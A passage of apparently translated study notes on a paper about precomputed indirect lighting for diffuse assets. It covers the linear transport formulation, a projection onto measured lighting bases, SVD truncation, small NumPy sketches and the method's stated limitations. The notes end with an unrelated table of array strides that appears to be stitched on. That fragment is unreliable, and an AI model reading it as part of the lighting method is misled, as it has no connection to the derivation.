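Of course, for image-based lighting one usually assumes $ L({\bf i}, {\bf x}) \approx L({\bf i}) $, so some quantities (e.g. the lighting coefficients $ l_i $) need not be stored per shading point
Runtime
- Look up the corresponding vectors according to the view direction $ {\bf o} $ and position $ {\bf x} $, and evaluate

For diffuse objects, $ \rho({\bf i}, {\bf o}) $ is constant, so the $ T_i $ term does not need to be expanded further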

Remarks from paper: PRT methods bake the transport matrix using implicit light sources defined by the illumination basis.
Those light sources shade the asset with positive and negative radiance values. Hence, a dedicated light transport algorithm is used for them.

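Idea of the Paper

The paper's framework only considers diffuse reflection, although in practice it should apply to any material that is not particularly glossy.

The framework works as follows

There is a linear relationship between the indirect light $ L_i({\bf x}; t) $ and the direct light $ L_d({\bf i}, {\bf x}; t) $
Framework:
- Discretize the space of $ {\bf x} $ and the space of $ {\bf i} \times t $ separately, obtaining $ I = MD $
  - This amounts to picking a set of basis vectors, each consisting of the $ L_d $ values at every position under one lighting condition
- Given a lighting condition $ x $ (the column vector of $ L_d $ values at every position), how do we solve for $ L_i $?
  - First decompose $ x $ in the basis $ D $, giving the coefficient vector $ c = (D^T D)^{-1} D^T x $
  - For every basis vector in $ D $ we have stored the corresponding output, so the result is $ y = Mx = I(D^T D)^{-1} D^T x $
Approximation:
- Take the SVD of $ I $ and keep the first $ n $ terms, giving the approximation $ I = U \Sigma V^T \approx U_n \Sigma_n V_n^T $
- $ y \approx U_n (\Sigma_n V_n^T) (D^T D)^{-1} D^T x $
  - let $ M_n = (\Sigma_n V_n^T) (D^T D)^{-1} D^T $
- Store $ U_n $ and $ M_n $
Runtime:
- Use the G-Buffer to obtain the values of $ L_d({\bf i}, {\bf x}; t) $ on the space $ \mathcal{X}_D $
- Compute $ y = U_n M_n x $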

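Estimating the Light Transport Matrix

Given an environment lighting condition $ t \in \mathcal T $, the diffuse light transport equation at a surface point $ {\bf x} $ takes the form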

$$ L_i({\bf x}; t) = \frac{1}{2 \pi}\int_{\mathcal{H}^2} L_d({\bf i}, {\bf x}; t) V({\bf i}, {\bf x}) \max(0, {\bf n} \cdot {\bf i}) d {\bf i} $$

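where $ L_i({\bf x}; t) $ is called the indirect light and $ L_d({\bf i}, {\bf x}; t) $ the direct light

$ L_d({\bf i}, {\bf x}; t) $ does not account for inter-reflection between the environment and the object; this can be ignored in the derivation for now, although in practice the method should also apply to cases with inter-transmission

Now discretize the space of $ {\bf x} $ and the space of $ {\bf i} \times t $ separately, obtaining two finite-dimensional spaces $ \mathcal{X}_D $ and $ \mathcal{T}_D $. On these two spaces both $ L_d $ and $ L_i $ can be written as matrices, with the convention that all entries of a column share the same lighting condition $ {\bf i}, t $.

For example, all entries of a column are lit by the same point light; in general the $ {\bf i} $ in $ L_d({\bf i}, {\bf x}; t) $ depends on $ t $

Denote the two resulting matrices by $ D $ and $ I $; then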

$$ I_k = f(D_k) \quad \forall k \in [0, |\mathcal{T}_D|] $$

From the above, $f$ here is a linear operator (is it?), so

$$ I = MD $$
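
A short check of the linearity claim, assuming $ f $ is exactly the diffuse transport integral given earlier in this section (the scalars $ a, b $ and the two direct-light fields $ L_d^{(1)}, L_d^{(2)} $ are introduced here only for illustration):

$$ \begin{aligned} f\left(a L_d^{(1)} + b L_d^{(2)}\right)({\bf x}) &= \frac{1}{2 \pi}\int_{\mathcal{H}^2} \left( a L_d^{(1)}({\bf i}, {\bf x}; t) + b L_d^{(2)}({\bf i}, {\bf x}; t) \right) V({\bf i}, {\bf x}) \max(0, {\bf n} \cdot {\bf i}) d {\bf i} \\ &= a f\left(L_d^{(1)}\right)({\bf x}) + b f\left(L_d^{(2)}\right)({\bf x}) \end{aligned} $$

Under that assumption $ V $ and the cosine term do not depend on $ L_d $, so linearity follows directly from linearity of the integral.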

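Further assume that our discretization of the space $ \mathcal T $ is good enough; then for any lighting condition the direct light vector $ x $ can be written as a linear combination of the columns of $ D $, satisfying

$$ x = Dc $$

Left-multiplying both sides by $ M $ gives

$$ Mx = MDc = Ic $$

That is, the indirect lighting produced by $x$ can be expressed as a linear combination of the columns of $I$

Since $ x = Dc $, and assuming $ D^T D $ is invertible, applying the left inverse gives

$$ c = (D^T D)^{-1} D^T x $$

Then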

$$ y = Mx = Ic = I (D^T D)^{-1} D^T x $$

This gives the result of passing an arbitrary direct light through light transport
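
The derivation above can be checked numerically with a small NumPy sketch. Everything here is an assumption for illustration: the sizes are arbitrary, both matrices are given the same number of rows, and a random matrix stands in for the transport operator $ M $ (which in practice is never formed explicitly; only the measured pairs $ D $ and $ I $ are available).

```python
import numpy as np

rng = np.random.default_rng(0)
num_points, num_conditions = 6, 3  # |X_D| and |T_D|, chosen arbitrarily

# Hypothetical ground-truth transport operator, used only to generate test data.
transport = rng.standard_normal((num_points, num_points))

# Columns of `direct` (D): direct light at every point for one lighting condition.
direct = rng.standard_normal((num_points, num_conditions))
# Columns of `indirect` (I): the matching indirect light, I = M D.
indirect = transport @ direct

# A new lighting condition that lies in the span of D's columns.
c_true = np.array([0.5, -1.0, 2.0])
x = direct @ c_true

# c = (D^T D)^{-1} D^T x, computed with a solve instead of an explicit inverse.
c = np.linalg.solve(direct.T @ direct, direct.T @ x)
# y = I c, the predicted indirect light.
y = indirect @ c
```

When $ x $ lies in the column space of $ D $, `y` matches `transport @ x`; for an $ x $ outside that span the same formula gives the result for the least-squares projection of $ x $ onto the columns of $ D $.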

Indirect Light Basis Functions

We assume that the space of indirect light has fairly low rank, so we take the SVD and keep the first $ n $ terms

$$ I = U \Sigma V^T \approx U_n \Sigma_n V_n^T = U_n C_n $$

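where we write $ C_n = \Sigma_n V_n^T $

Substituting back gives the approximate result of passing any combination of direct light through the light transport equation

$$ \begin{aligned} y &\approx U_n C_n (D^T D)^{-1} D^T x \\ &= U_n M_n x \end{aligned} $$

where $ M_n = C_n (D^T D)^{-1} D^T $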
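
A minimal NumPy sketch of the truncation, under stated assumptions: the sizes are arbitrary, and the indirect-light matrix is constructed to have rank exactly $ n $ so that the truncated form can be compared against the full one. Real measured data would only be approximately low rank.

```python
import numpy as np

rng = np.random.default_rng(1)
num_points, num_conditions, n = 8, 5, 2  # arbitrary sizes for illustration

direct = rng.standard_normal((num_points, num_conditions))  # D
# Hypothetical indirect-light matrix I with rank exactly n.
indirect = (rng.standard_normal((num_points, n))
            @ rng.standard_normal((n, num_conditions)))

U, s, Vt = np.linalg.svd(indirect, full_matrices=False)
U_n = U[:, :n]                    # indirect-light basis, num_points x n
C_n = np.diag(s[:n]) @ Vt[:n, :]  # C_n = Sigma_n V_n^T, n x num_conditions
# M_n = C_n (D^T D)^{-1} D^T, n x num_points
M_n = C_n @ np.linalg.solve(direct.T @ direct, direct.T)

# A direct-light vector in the span of D's columns.
x = direct @ rng.standard_normal(num_conditions)

y_full = indirect @ np.linalg.solve(direct.T @ direct, direct.T @ x)
y_lowrank = U_n @ (M_n @ x)
```

Only `U_n` and `M_n` need to be stored; at runtime `M_n @ x` yields $ n $ coefficients, and `U_n` expands them back to per-point indirect light.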

Direct Light Encoding

If needed, one can consider SH basis functions; see the paper for details

Comparison with Classical PRT

First, because classical PRT restricts the frequency content of the incoming lighting, we can see that the directional light leaks behind the object. Our method does not restrict the frequency content of incoming light but rather the space of possible indirect illumination. Hence, we can better reproduce such lighting scenario.

Furthermore, classical PRT is performed on the vertices of the asset. This can cause interpolation artifacts when the asset is poorly tessellated, and it also links performance to the vertex count. Since we rely on a meshless approach, we are free of issues.

Limitations

Sparse Illumination Measurement. As shown in Section 3.3, the sampling of the measurement points is linked to the achievable lighting dimensionality. Thus, it needs to be sufficiently dense to reproduce the space of observable lighting configurations. It follows that a lighting scenario mixing many light types might require a denser sampling.

No Directionality. We reconstruct a diffuse appearance when reconstructing indirect illumination. However, since our method does not depend on the encoding of the measured indirect illumination, it can be extended to reconstruct glossy appearances e.g. directional distributions using directional sampling or any basis such as Spherical Harmonics. However, our method is likely to be restricted to low frequency gloss here and will not work to render specular reflections.

Large Assets. Our solution is not designed to handle assets such as levels in a game. Because we handle light transport globally and reduce it with a handful of basis functions, we cannot reconstruct the interconnected interiors or large environments in which the combinatorics of possible illumination is large. For such case, our method would require to be extended to handle modular transfer between disjoint transport solutions (Similar to Loos et al. [2011]).

Array	Ratio	Local strides	Global strides	Loop stride
a	n/16	{0:1, 1:n}	{0:0, 1:n*16}	16
b	n/16	{0:1, 1:n}	{0:16, 1:0}	16*n
